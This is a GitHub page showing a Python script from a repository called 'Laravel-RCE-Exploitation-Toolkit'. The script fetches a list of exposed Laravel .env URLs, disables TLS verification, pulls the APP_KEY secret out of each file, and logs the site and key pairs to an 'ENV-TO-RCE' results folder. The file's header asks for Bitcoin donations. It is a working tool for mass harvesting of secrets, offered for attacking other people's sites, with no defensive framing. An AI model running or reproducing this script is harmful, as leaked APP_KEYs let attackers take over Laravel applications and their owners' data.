Laravel-RCE-Exploitation-Toolkit/envtobase64.py at main · khadafigans/Laravel-RCE-Exploitation-Toolkit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
## Author Bob Marley
## BTC : 17sbbeTzDMP4aMELVbLW78Rcsj4CDRBiZh (All donation Acceptable and thank you in advance)
## Find https://changehere.com and change it into your website

import os
import requests
import re
from datetime import datetime
from pystyle import Write, Colors, Colorate, Center
from colorama import Fore, Style, init
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

init(autoreset=True)

def print_ascii():
    ascii_art = r"""
███████╗███╗   ██╗██╗   ██╗    ████████╗ ██████╗     ██████╗  ██████╗███████╗
██╔════╝████╗  ██║██║   ██║    ╚══██╔══╝██╔═══██╗    ██╔══██╗██╔════╝██╔════╝
█████╗  ██╔██╗ ██║██║   ██║       ██║   ██║   ██║    ██████╔╝██║     █████╗
██╔══╝  ██║╚██╗██║╚██╗ ██╔╝       ██║   ██║   ██║    ██╔══██╗██║     ██╔══╝
███████╗██║ ╚████║ ╚████╔╝        ██║   ╚██████╔╝    ██║  ██║╚██████╗███████╗
╚══════╝╚═╝  ╚═══╝  ╚═══╝         ╚═╝    ╚═════╝     ╚═╝  ╚═╝ ╚═════╝╚══════╝
    """
    print(Center.XCenter(Colorate.Horizontal(Colors.red_to_green, ascii_art, 1)))
    print()

def get_app_key(env_text):
    match = re.search(r'APP_KEY\s*=\s*([^\s]+)', env_text)
    if match:
        return match.group(1)
    return None

def main():
    print_ascii()
    input_file = Write.Input("Input your .env URL list filename: ", Colors.green_to_yellow, interval=0.005)
    if not os.path.isfile(input_file):
        Write.Print(f"\n[!] File not found: {input_file}\n", Colors.red_to_yellow, interval=0.002)
        return

    now = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
    output_dir = "ENV-TO-RCE"
    os.makedirs(output_dir, exist_ok=True)
    output_file = os.path.join(output_dir, f"Result_{now}.txt")

    with open(input_file) as f:
        env_urls = [line.strip() for line in f if line.strip()]

    for env_url in env_urls:
        site = env_url
        if site.endswith("/.env"):
            site = site[:-5]
        try:
            resp = requests.get(env_url, timeout=10, verify=False)
            if resp.status_code == 200:
                app_key = get_app_key(resp.text)
                if app_key:
                    result_line = f"{site}|{app_key}"
                    with open(output_file, "a") as out:
                        out.write(result_line + "\n")
                    Write.Print(f"[FOUND] {result_line}\n", Colors.green_to_yellow, interval=0.001)
                else:
                    Write.Print(f"[NO APP_KEY] {env_url}\n", Colors.yellow_to_red, interval=0.001)
            else:
                Write.Print(f"[NO ENV] {env_url} (HTTP {resp.status_code})\n", Colors.red_to_yellow, interval=0.001)
        except Exception as e:
            Write.Print(f"[ERROR] {env_url} => {e}\n", Colors.red_to_yellow, interval=0.001)

    Write.Print(f"\n[+] Done! Results saved in {output_file}\n", Colors.green_to_yellow, interval=0.002)

if __name__ == "__main__":
    main()